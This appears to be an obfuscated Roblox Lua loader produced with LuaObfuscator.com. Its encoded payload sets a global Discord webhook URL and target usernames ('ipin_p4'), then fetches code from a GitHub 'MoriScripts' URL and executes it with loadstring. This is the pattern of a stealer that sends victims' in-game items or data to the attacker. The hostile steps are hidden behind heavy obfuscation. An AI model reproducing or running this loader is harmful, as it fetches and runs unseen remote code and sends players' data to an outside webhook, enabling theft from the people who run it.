--[[

 .____                  ________ ___.    _____                           __                

 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 

 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \

 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/

 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   

         \/          \/         \/    \/                \/     \/     \/                   

          \_Welcome to LuaObfuscator.com   (Alpha 0.2.8) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==1) then v21=nil;function v21(v31,v32,v33)if v33 then local v81=(v31/(((1 + 4) -3)^(v32-((879 -(282 + 595)) -1))))%((3 -1)^(((v33-1) -(v32-(2 -1))) + (620 -(555 + 64)))) ;return v81-(v81%1) ;else local v82=(933 -(857 + 74))^(v32-(569 -(367 + 201))) ;return (((v31%(v82 + v82))>=v82) and (928 -(214 + 713))) or (0 + 0) ;end end v22=nil;v18=2;end if (v18==3) then v24=nil;function v24()local v34,v35,v36,v37=v1(v16,v19,v19 + 3 );v19=v19 + (1641 -((2793 -(226 + 1044)) + 114)) ;return (v37 * ((65651351 -50574350) + (1700332 -(32 + 85)))) + (v36 * (93426 -27890)) + (v35 * (1321 -(68 + 997))) + v34 ;end v25=nil;v18=4;end if (v18==6) then v29=nil;function v29()local v38=0 -0 ;local v39;local v40;local v41;local v42;local v43;local v44;while true do local v64=0 -0 ;while true do if (v64==(0 -0)) then if (v38~=(0 -0)) then else local v94=1824 -(1195 + 629) ;while true do if (v94==(3 -2)) then v41={};v38=242 -(187 + 54) ;break;end if (v94~=(0 -0)) then else v39={};v40={};v94=2 -1 ;end end end if (v38~=(3 -0)) then else for v97=1 + 0 ,v24() do v40[v97-(4 -3) ]=v29();end return v42;end v64=1 + 0 ;end if (v64==1) then if (v38~=2) then else local v95=0;while true do if (v95==(1 -0)) then for v100=1,v24() do local v101=0;local v102;while true do if (v101==0) then v102=v22();if (v21(v102,1 + 0 ,2 -1 )==(1413 -(447 + 966))) then local v129=0 -0 ;local v130;local v131;local v132;local v133;while true do if (v129~=(1819 -(1703 + 114))) then else while true do if (v130==(1637 -(1373 + 263))) then local v167=1000 -(451 + 549) ;local v168;while true do if (v167~=0) then else v168=0 + 0 ;while true do if (v168~=(1 -0)) then else v130=2 -0 ;break;end if (v168==(701 -(376 + 325))) then v133={v23(),v23(),nil,nil};if (v131==0) then local v177=0;local v178;local v179;while true do if (v177==(2 -1)) then while true do if (v178==(0 + 0)) then v179=0 + 0 ;while true do if (v179~=(0 -0)) then else v133[17 -(9 + 5) ]=v23();v133[380 -(85 + 291) ]=v23();break;end end break;end end break;end if (v177==(1265 -(243 + 1022))) then v178=0;v179=nil;v177=3 -2 ;end end elseif (v131==(1582 -(1535 + 46))) then v133[3]=v24();elseif (v131==(2 + 0)) then v133[1183 -(1123 + 57) ]=v24() -((2 + 0)^(270 -(163 + 91))) ;elseif (v131==(1933 -(1869 + 61))) then local v186=0 + 0 ;local v187;while true do if (v186==0) then v187=0 -0 ;while true do if (0~=v187) then else v133[4 -1 ]=v24() -((1 + 1)^(21 -5)) ;v133[4]=v23();break;end end break;end end end v168=1 + 0 ;end end break;end end end if (v130~=0) then else local v169=0;while true do if (v169~=(0 -0)) then else v131=v21(v102,2 + 0 ,3);v132=v21(v102,1478 -(1329 + 145) ,977 -(140 + 831) );v169=1;end if (v169==(291 -(60 + 230))) then v130=1851 -(1409 + 441) ;break;end end end if (v130==(721 -(15 + 703))) then if (v21(v132,2 + 1 ,441 -(262 + 176) )==1) then v133[1725 -(345 + 1376) ]=v44[v133[692 -(198 + 490) ]];end v39[v100]=v133;break;end if (v130==2) then local v171=0;local v172;while true do if (v171==(0 + 0)) then v172=1024 -(706 + 318) ;while true do if (v172==1) then v130=13 -10 ;break;end if (v172==0) then local v176=0 -0 ;while true do if (0~=v176) then else if (v21(v132,1207 -(696 + 510) ,1 -0 )==(2 -1)) then v133[2 + 0 ]=v44[v133[1264 -(1091 + 171) ]];end if (v21(v132,2 + 0 ,1 + 1 )~=(3 -2)) then else v133[9 -6 ]=v44[v133[1089 -(461 + 625) ]];end v176=375 -(123 + 251) ;end if (v176==(1289 -(993 + 295))) then v172=4 -3 ;break;end end end end break;end end end end break;end if (v129==(698 -(208 + 490))) then v130=0 + 0 ;v131=nil;v129=1 + 0 ;end if (v129~=(1172 -(418 + 753))) then else v132=nil;v133=nil;v129=1 + 1 ;end end end break;end end end v38=3;break;end if (v95~=(836 -(660 + 176))) then else for v103=1,v43 do local v104=0 + 0 ;local v105;local v106;local v107;local v108;while true do if (v104==(1 + 1)) then while true do if (v105~=(1 + 0)) then else v108=nil;while true do if (v106~=(203 -(14 + 188))) then else if (v107==(530 -(406 + 123))) then v108=v22()~=(675 -(534 + 141)) ;elseif (v107==(1 + 1)) then v108=v25();elseif (v107~=(3 + 0)) then else v108=v26();end v44[v103]=v108;break;end if (v106==(0 + 0)) then local v162=0 -0 ;local v163;while true do if (v162==(0 -0)) then v163=0;while true do if (v163==(1322 -(1249 + 73))) then local v175=0 + 0 ;while true do if ((1145 -(466 + 679))==v175) then v107=v22();v108=nil;v175=2 -1 ;end if (v175~=(2 -1)) then else v163=1;break;end end end if (v163==(1901 -(106 + 1794))) then v106=1;break;end end break;end end end end break;end if (v105==(0 + 0)) then local v157=0 + 0 ;while true do if (v157~=0) then else v106=396 -(115 + 281) ;v107=nil;v157=1;end if (v157==1) then v105=2 -1 ;break;end end end end break;end if (v104==(0 + 0)) then v105=0 -0 ;v106=nil;v104=3 -2 ;end if (v104~=(868 -(550 + 317))) then else v107=nil;v108=nil;v104=2 -0 ;end end end v42[3 -0 ]=v22();v95=2 -1 ;end end end if (v38==(2 -1)) then local v96=285 -(134 + 151) ;while true do if ((1428 -(41 + 1386))==v96) then v44={};v38=105 -(17 + 86) ;break;end if (v96==(1665 -(970 + 695))) then v42={v39,v40,nil,v41};v43=v24();v96=1;end end end break;end end end end v30=nil;v18=7;end if (v18==4) then function v25()local v45=v24();local v46=v24();local v47=1 -0 ;local v48=(v21(v46,2 -1 ,1002 -(18 + 964) ) * (((1719 -(1126 + 425)) -(122 + 44))^(19 + 13))) + v45 ;local v49=v21(v46,426 -(118 + 287) ,53 -22 );local v50=((v21(v46,105 -73 )==(1 + 0)) and  -((3 -2) + 0)) or (1 -0) ;if (v49==(65 -(30 + 35))) then if (v48==(0 + 0)) then return v50 * (0 + 0) ;else v49=1258 -((2164 -(118 + 1003)) + 214) ;v47=0 -0 ;end elseif (v49==(3259 -(323 + 889))) then return ((v48==((0 -0) + 0)) and (v50 * ((2 -1)/(0 + 0)))) or (v50 * NaN) ;end return v8(v50,v49-(1603 -(361 + 219)) ) * (v47 + (v48/((322 -(53 + 267))^52))) ;end v26=nil;function v26(v51)local v52;if  not v51 then v51=v24();if (v51==(377 -(142 + 235))) then return "";end end v52=v3(v16,v19,(v19 + v51) -(4 -3) );v19=v19 + v51 ;local v53={};for v65=1 + 0 , #v52 do v53[v65]=v2(v1(v3(v52,v65,v65)));end return v6(v53);end v18=5;end if (v18==2) then function v22()local v54=v1(v16,v19,v19);v19=v19 + 1 ;return v54;end v23=nil;function v23()local v55,v56=v1(v16,v19,v19 + (979 -(553 + 424)) );v19=v19 + (3 -1) ;return (v56 * (226 + 30)) + v55 ;end v18=3;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v57)if (v1(v57,2)==79) then local v83=0;while true do if (v83==0) then v20=v0(v3(v57,1,1));return "";end end else local v84=v2(v0(v57,16));if v20 then local v87=v5(v84,v20);v20=nil;return v87;else return v84;end end end);v18=1;end if (v18==7) then function v30(v58,v59,v60)local v61=v58[1];local v62=v58[2];local v63=v58[3];return function(...)local v67=v61;local v68=v62;local v69=v63;local v70=v28;local v71=1;local v72= -1;local v73={};local v74={...};local v75=v12("#",...) -1 ;local v76={};local v77={};for v85=0,v75 do if (v85>=v69) then v73[v85-v69 ]=v74[v85 + 1 ];else v77[v85]=v74[v85 + 1 ];end end local v78=(v75-v69) + 1 ;local v79;local v80;while true do local v86=0;while true do if (v86==1) then if (v80<=10) then if (v80<=4) then if (v80<=1) then if (v80>0) then v77[v79[2]]=v79[3]~=0 ;else local v110=v79[2];v77[v110]=v77[v110](v13(v77,v110 + 1 ,v72));end elseif (v80<=2) then do return;end elseif (v80==3) then v77[v79[2]]();else local v134=v79[2];v77[v134]=v77[v134](v13(v77,v134 + 1 ,v72));end elseif (v80<=7) then if (v80<=5) then if (v77[v79[2]]==v79[4]) then v71=v71 + 1 ;else v71=v79[3];end elseif (v80==6) then v77[v79[2]]();else local v137=0;local v138;local v139;local v140;local v141;while true do if (v137==1) then v72=(v140 + v138) -1 ;v141=0;v137=2;end if (2==v137) then for v164=v138,v72 do v141=v141 + 1 ;v77[v164]=v139[v141];end break;end if (v137==0) then v138=v79[2];v139,v140=v70(v77[v138](v13(v77,v138 + 1 ,v79[3])));v137=1;end end end elseif (v80<=8) then local v112=v79[2];local v113=v77[v79[3]];v77[v112 + 1 ]=v113;v77[v112]=v113[v79[4]];elseif (v80>9) then v77[v79[2]][v79[3]]=v79[4];else v77[v79[2]]=v79[3];end elseif (v80<=15) then if (v80<=12) then if (v80>11) then v71=v79[3];else local v118=v79[2];local v119,v120=v70(v77[v118](v13(v77,v118 + 1 ,v79[3])));v72=(v120 + v118) -1 ;local v121=0;for v127=v118,v72 do local v128=0;while true do if (v128==0) then v121=v121 + 1 ;v77[v127]=v119[v121];break;end end end end elseif (v80<=13) then if (v77[v79[2]]==v79[4]) then v71=v71 + 1 ;else v71=v79[3];end elseif (v80==14) then v77[v79[2]]=v60[v79[3]];else v71=v79[3];end elseif (v80<=18) then if (v80<=16) then local v122=v79[2];local v123=v77[v79[3]];v77[v122 + 1 ]=v123;v77[v122]=v123[v79[4]];elseif (v80==17) then v77[v79[2]][v79[3]]=v79[4];else v77[v79[2]]=v60[v79[3]];end elseif (v80<=19) then do return;end elseif (v80==20) then v77[v79[2]]=v79[3];else v77[v79[2]]=v79[3]~=0 ;end v71=v71 + 1 ;break;end if (0==v86) then v79=v67[v71];v80=v79[1];v86=1;end end end end;end return v30(v29(),{},v17)(...);end end end v15("LOL!0C3O00028O00026O00F03F03023O005F4703073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F3O3130312O36393336303839382O302O37342F796B4F78316B55736B31323935654175506B364F79694B4A6F704466412D6D2O3936464B4F494A486D317673716A576F57344845575A516A736A526B742D305244536573030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403463O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F4D6F7269536372697074732F6D61696E2F4D6F72695363726970745A03083O00557365724E616D6503073O006970696E5F703403093O00557365724E616D653200173O0012143O00013O00260D3O000E0001000200040C3O000E000100120E000100033O00301100010004000500120E000100063O00120E000200073O002008000200020008001214000400094O0001000500014O0007000200054O000400013O00022O000600010001000100040C3O0016000100260D3O00010001000100040C3O0001000100120E000100033O0030110001000A000B00120E000100033O0030110001000C000B0012143O00023O00040C3O000100012O00023O00017O00",v9(),...);end
